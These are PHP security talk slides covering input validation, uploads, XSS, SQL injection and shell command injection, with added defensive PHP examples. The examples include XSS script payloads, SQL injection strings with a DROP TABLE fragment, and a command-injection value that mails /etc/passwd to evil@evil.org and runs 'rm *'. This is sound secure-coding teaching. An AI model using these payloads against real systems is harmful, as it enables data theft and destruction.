Php Security

presentation given by uttam in PHPCamp

  1. PHP Security, by Uttam Kumar. Email: [email_address]. Mobile: 9730791715
  2. What is Security?
     • measurement…
     • safety…
     • protection…
  3. Secure Web Applications
     • Web security issues have to do with:
       • hacker attacks
         • denial of service
         • server hijacking
       • common threats
       • compromise of data
  4. PHP & Security
     • a growing language…
     • a major concern…
  5. Never trust the web…
     • Input data validation
       • register_globals = Off
       • $_REQUEST[]: a big NO NO…
       • Type-cast input data
         • Do not rely on is_numeric() to check that data is numeric (locale problem)
         • Use a regular expression if the data is a string
       • Path validation
         • Always use basename()
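The following is an added example, not code from Uttam's slides: it shows the three checks from this slide (cast numeric input, match string input against a strict regular expression, reduce a path with basename()) as small functions run over a constructed request array standing in for $_GET. The function names and the limits are assumptions made for the example; filter_var() is used for the integer case because it is locale-independent.

```php
<?php
// Added example (not from the slides): validating untrusted request input by
// filtering it to the expected type instead of trusting it as received.
declare(strict_types=1);

// Integer input: FILTER_VALIDATE_INT is locale-independent (unlike a naive
// is_numeric() check) and rejects "12abc", "1e3" and "0x1A".
function clean_int(array $src, string $key, int $min, int $max): ?int
{
    if (!isset($src[$key]) || !is_string($src[$key])) {
        return null;
    }
    $v = filter_var($src[$key], FILTER_VALIDATE_INT, [
        'options' => ['min_range' => $min, 'max_range' => $max],
    ]);
    return $v === false ? null : $v;
}

// String input: accept only what a strict, anchored regular expression allows.
// \A and \z are used instead of ^ and $ so a trailing newline cannot slip past.
function clean_username(array $src, string $key): ?string
{
    if (!isset($src[$key]) || !is_string($src[$key])) {
        return null;
    }
    return preg_match('/\A[a-z0-9_]{3,32}\z/', $src[$key]) === 1 ? $src[$key] : null;
}

// Path input: basename() strips every directory component ("../../etc/passwd"
// becomes "passwd"); the result is then resolved and checked to still lie
// inside the intended directory, which basename() alone does not guarantee.
function clean_download_path(array $src, string $key, string $baseDir): ?string
{
    if (!isset($src[$key]) || !is_string($src[$key])) {
        return null;
    }
    $name = basename($src[$key]);
    if ($name === '' || $name[0] === '.') {   // no empty names, no dot files, no ".."
        return null;
    }
    $full = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    $base = realpath($baseDir);
    if ($full === false || $base === false
        || strpos($full, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $full;
}

// Constructed sample request (assumed values), standing in for $_GET.
$input = [
    'page' => '0x1A',                    // not a plain decimal integer
    'user' => "alice\n",                 // trailing newline after a valid name
    'file' => '../../../../etc/passwd',  // traversal attempt
];

var_dump(clean_int($input, 'page', 1, 1000));            // rejected
var_dump(clean_username($input, 'user'));                // rejected
var_dump(clean_download_path($input, 'file', __DIR__));  // rejected unless ./passwd exists
var_dump(clean_int(['page' => '42'], 'page', 1, 1000));  // accepted as an int
```

Each function returns null for anything it does not accept, so callers branch on the result rather than on whether the raw value "looked" fine.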
  6. Never trust the web…
     • Content size validation
       • Use server-side maximum length validation
       • File upload
         • Check the destination file size with $_FILES['name']['size']
         • I think the browser's MIME header is reliable, right?
           • Use getimagesize() in the case of an image
         • Uploads from an external source, like an avatar
           • Make a local copy if path/of/file is submitted as a URL.
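The following is an added example, not from Uttam's slides: an upload handler that applies this slide's checks. The size limit comes from $_FILES['…']['size'], the client-sent MIME type is ignored and the real format is read with getimagesize(), and an avatar given as a URL is first copied to a bounded local temp file and then put through the same checks. The limits, the directory names and the helper names are assumptions; the script is meant to run as the target of a multipart form.

```php
<?php
// Added example (not from the slides): server-side checks for an image upload.
declare(strict_types=1);

const MAX_UPLOAD_BYTES = 512 * 1024;   // assumed limit
const ALLOWED_IMAGE_TYPES = [IMAGETYPE_PNG => 'png', IMAGETYPE_JPEG => 'jpg', IMAGETYPE_GIF => 'gif'];

// Validates one $_FILES entry. Returns [true, storedPath] or [false, reason].
function accept_image_upload(array $file, string $destDir): array
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return [false, 'upload error ' . (string) $file['error']];
    }
    // Server-side size limit, independent of any client-side max length.
    if ($file['size'] > MAX_UPLOAD_BYTES) {
        return [false, 'file too large'];
    }
    // Only handle files that PHP itself received through the upload mechanism.
    if (!is_uploaded_file($file['tmp_name'])) {
        return [false, 'not an uploaded file'];
    }
    // $file['type'] is set by the browser and is never consulted; the bytes are.
    $info = @getimagesize($file['tmp_name']);
    if ($info === false || !isset(ALLOWED_IMAGE_TYPES[$info[2]])) {
        return [false, 'not a supported image'];
    }
    // Server-generated name: the client's file name decides nothing on disk.
    $dest = $destDir . '/' . bin2hex(random_bytes(16)) . '.' . ALLOWED_IMAGE_TYPES[$info[2]];
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return [false, 'could not store file'];
    }
    return [true, $dest];
}

// Avatar submitted as a URL (hypothetical helper): only http/https, no
// redirects, at most MAX_UPLOAD_BYTES copied into a local temp file, then the
// same getimagesize() check as above. Returns the temp path or null.
function fetch_remote_avatar(string $url): ?string
{
    $parts = parse_url($url);
    if ($parts === false || !in_array($parts['scheme'] ?? '', ['http', 'https'], true)) {
        return null;   // rules out file://, php://, ftp:// and friends
    }
    $ctx = stream_context_create(['http' => ['timeout' => 5, 'follow_location' => 0]]);
    $in = @fopen($url, 'rb', false, $ctx);
    if ($in === false) {
        return null;
    }
    $tmp = tempnam(sys_get_temp_dir(), 'avatar');
    $out = fopen($tmp, 'wb');
    $copied = stream_copy_to_stream($in, $out, MAX_UPLOAD_BYTES + 1);
    fclose($in);
    fclose($out);
    $info = ($copied === false || $copied > MAX_UPLOAD_BYTES) ? false : @getimagesize($tmp);
    if ($info === false || !isset(ALLOWED_IMAGE_TYPES[$info[2]])) {
        unlink($tmp);
        return null;
    }
    return $tmp;
}

// Usage as an upload handler (assumed form field "avatar", assumed directory).
if (isset($_FILES['avatar'])) {
    [$ok, $msg] = accept_image_upload($_FILES['avatar'], __DIR__ . '/avatars');
    echo $ok ? "stored at $msg\n" : "rejected: $msg\n";
}
```

The same ALLOWED_IMAGE_TYPES map is used both to accept the file and to choose its extension, so the stored name always reflects what getimagesize() actually found rather than what the client claimed.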
  7. XSS attack
     • Can lead to embarrassment.
     • Session take-over.
     • Password theft.
     • User tracking by 3rd parties
  8. XSS attack
     • Prevention is better than cure
       • Use strip_tags()
         • No tags allowed, please
       • Use htmlentities()
       • Is $_SERVER safe?
         • It can be set…
         • Php.php/%22%3E%3Cscript%3Ealert('xss')%3c/script%3E%3cfoo
         • $_SERVER['PATH_INFO'] = /"><script>alert('xss')</script><foo
         • $_SERVER['PHP_SELF'] = /php.php/"><script>alert('xss')</script><foo
     • IP-based info
       • Use HTTP_X_FORWARDED_FOR
       • Use long2ip()
           $aIp = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
           $sValidIp = long2ip(ip2long(array_pop($aIp)));
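The following is an added example, not from Uttam's slides: it escapes a $_SERVER['PHP_SELF'] value shaped like the slide's payload before it is placed in a form attribute, and it turns the slide's HTTP_X_FORWARDED_FOR snippet into a function that only consults that header when the direct peer is a known proxy and validates the result with FILTER_VALIDATE_IP. htmlspecialchars() is used here in place of htmlentities() (it covers the characters that matter in HTML); the $server array and the proxy list are constructed for the example.

```php
<?php
// Added example (not from the slides): escaping $_SERVER-derived values
// before they reach HTML, and validating a forwarded client IP.
declare(strict_types=1);

// Escape for an HTML text node or attribute value. ENT_QUOTES covers both
// quote characters so the value cannot close an attribute and open a tag.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// A form action built from the current script. PHP_SELF carries the
// client-chosen PATH_INFO suffix, so it is escaped like any other input
// (SCRIPT_NAME, which lacks that suffix, is the safer source when it suffices).
function form_action(array $server): string
{
    return '<form action="' . h($server['PHP_SELF']) . '" method="post">';
}

// Client IP behind a reverse proxy. X-Forwarded-For is a header any client can
// send, so it is only consulted when REMOTE_ADDR is one of our own proxies;
// the last address in the chain is the one that proxy appended. The candidate
// is then validated: long2ip(ip2long()) only normalises a value, it does not
// reject garbage such as "1" or "999.1.1.1".
function client_ip(array $server, array $trustedProxies): ?string
{
    $peer = $server['REMOTE_ADDR'] ?? '';
    if (in_array($peer, $trustedProxies, true) && !empty($server['HTTP_X_FORWARDED_FOR'])) {
        $chain = array_map('trim', explode(',', $server['HTTP_X_FORWARDED_FOR']));
        $candidate = array_pop($chain);
    } else {
        $candidate = $peer;
    }
    $ip = filter_var($candidate, FILTER_VALIDATE_IP);
    return $ip === false ? null : $ip;
}

// Constructed $_SERVER stand-in using the slide's payload and assumed addresses.
$server = [
    'PHP_SELF'             => '/php.php/"><script>alert(\'xss\')</script><foo',
    'REMOTE_ADDR'          => '10.0.0.5',
    'HTTP_X_FORWARDED_FOR' => '203.0.113.9, 198.51.100.7',
];

echo form_action($server), "\n";                // every < > " ' is entity-encoded
var_dump(client_ip($server, ['10.0.0.5']));     // proxy trusted: last forwarded address
var_dump(client_ip($server, []));               // proxy not trusted: REMOTE_ADDR itself
var_dump(client_ip(['REMOTE_ADDR' => '10.0.0.5', 'HTTP_X_FORWARDED_FOR' => 'junk'], ['10.0.0.5']));
```

The last call shows the point of validating rather than normalising: a forged, non-IP value in the header yields null instead of a made-up address.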
  9. SQL Injection
     • Arbitrary query execution
     • Removal of data.
     • Modification of existing values.
     • Denial of service.
     • Arbitrary data injection.
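The slide lists what SQL injection can do but not how to prevent it, so here is an added example (not from Uttam's slides) of the mitigation: the same lookup written with string concatenation and with a PDO prepared statement, plus an allowlist for the one place a parameter cannot be bound (an ORDER BY column). It runs against an in-memory SQLite database with constructed rows; the table and function names are assumptions.

```php
<?php
// Added example (not from the slides): concatenated SQL versus a prepared
// statement, run against constructed data in an in-memory SQLite database.
declare(strict_types=1);

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, role TEXT)');
$db->exec("INSERT INTO users (name, role) VALUES ('alice', 'admin'), ('bob', 'user')");

// Vulnerable form: the input becomes part of the SQL text, so a quote inside
// it changes the statement itself (the "arbitrary query execution" of slide 9).
function find_user_unsafe(PDO $db, string $name): array
{
    $sql = "SELECT id, name, role FROM users WHERE name = '" . $name . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Safe form: the value travels as a bound parameter and can never alter the
// statement's structure, whatever characters it contains.
function find_user(PDO $db, string $name): array
{
    $stmt = $db->prepare('SELECT id, name, role FROM users WHERE name = :name');
    $stmt->bindValue(':name', $name, PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Identifiers (column names, ORDER BY targets) cannot be bound as parameters,
// so user input is mapped onto a fixed allowlist instead of being interpolated.
function list_users(PDO $db, string $sortBy): array
{
    $allowed = ['name' => 'name', 'role' => 'role', 'id' => 'id'];
    $column = $allowed[$sortBy] ?? 'id';
    return $db->query("SELECT id, name, role FROM users ORDER BY $column")
              ->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed input containing a quote: no user has this name, yet the unsafe
// form turns it into a condition that matches every row, while the prepared
// statement simply finds nothing.
$input = "x' OR '1'='1";
var_dump(count(find_user_unsafe($db, $input)));
var_dump(count(find_user($db, $input)));
var_dump(array_column(list_users($db, 'name; DROP TABLE users'), 'name'));  // falls back to ORDER BY id
```

The allowlist in list_users() is the pattern to reuse wherever a query part is structural (table, column, sort direction, LIMIT): decide it from a fixed map, never from the request string.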
  10. Calling External Programs
     Sometimes you need to call external programs (using system(), exec(), popen(), passthru(), or the back-tick operator). This is extremely dangerous if the program name or any of its arguments are based on user input. Instead use escapeshellarg() or escapeshellcmd() so that users can't trick the system into executing arbitrary commands.

         <?php $fp = popen('/usr/sbin/sendmail -i ' . $to, 'w'); ?>

     The user could control $to to yield:

         http://examp.com/send.php?$to=evil%40evil.org+%3C+%2Fpasswd%3B+rm+%2A

     which would result in running the command:

         /usr/sbin/sendmail -i evil@evil.org /etc/passwd; rm *

     A solution would be:

         $fp = popen('/usr/sbin/sendmail -i ' . escapeshellarg($to), 'w');
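The following is an added example, not from Uttam's slides: it builds the slide's sendmail command with escapeshellarg() but first validates that $to is actually an e-mail address, and it also shows the variant that avoids the shell entirely by handing proc_open() an argument array (PHP 7.4 and later). The sample inputs are constructed; the function names are assumptions.

```php
<?php
// Added example (not from the slides): two layers for the sendmail call from
// slide 10 - validate the address, then either quote it for the shell or
// bypass the shell altogether.
declare(strict_types=1);

// Returns the command line to run, or null if $to is not an e-mail address.
function sendmail_command(string $to): ?string
{
    // First gate: reject anything that is not shaped like an address, so the
    // hostile value never reaches a shell at all, escaped or not.
    $addr = filter_var($to, FILTER_VALIDATE_EMAIL);
    if ($addr === false) {
        return null;
    }
    // Second gate: escapeshellarg() wraps the value in single quotes and
    // escapes embedded quotes, so the shell sees exactly one argument.
    return '/usr/sbin/sendmail -i ' . escapeshellarg($addr);
}

// No shell involved: proc_open() with an argv array passes each element
// straight to the program, so shell metacharacters are never interpreted.
// Returns [process, pipes] or null.
function open_sendmail(string $to): ?array
{
    $addr = filter_var($to, FILTER_VALIDATE_EMAIL);
    if ($addr === false) {
        return null;
    }
    $spec = [0 => ['pipe', 'r'], 1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    $proc = proc_open(['/usr/sbin/sendmail', '-i', $addr], $spec, $pipes);
    return is_resource($proc) ? [$proc, $pipes] : null;
}

// Constructed inputs: the slide's hostile value and an ordinary address.
$hostile = 'evil@evil.org /etc/passwd; rm *';
$normal  = 'user@example.com';

var_dump(sendmail_command($hostile));   // rejected before any command is built
var_dump(sendmail_command($normal));    // one quoted argument after -i
var_dump(escapeshellarg($hostile));     // what quoting alone would have produced:
                                        // a single argument, spaces and ';' inert
```

escapeshellarg() alone already defeats the slide's payload, because the whole string becomes one quoted argument to sendmail; the validation step is there so that a malformed address is refused outright instead of being mailed to, and the proc_open() form removes the shell from the picture entirely.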
  11. Questions…????
  12. Thank You!!
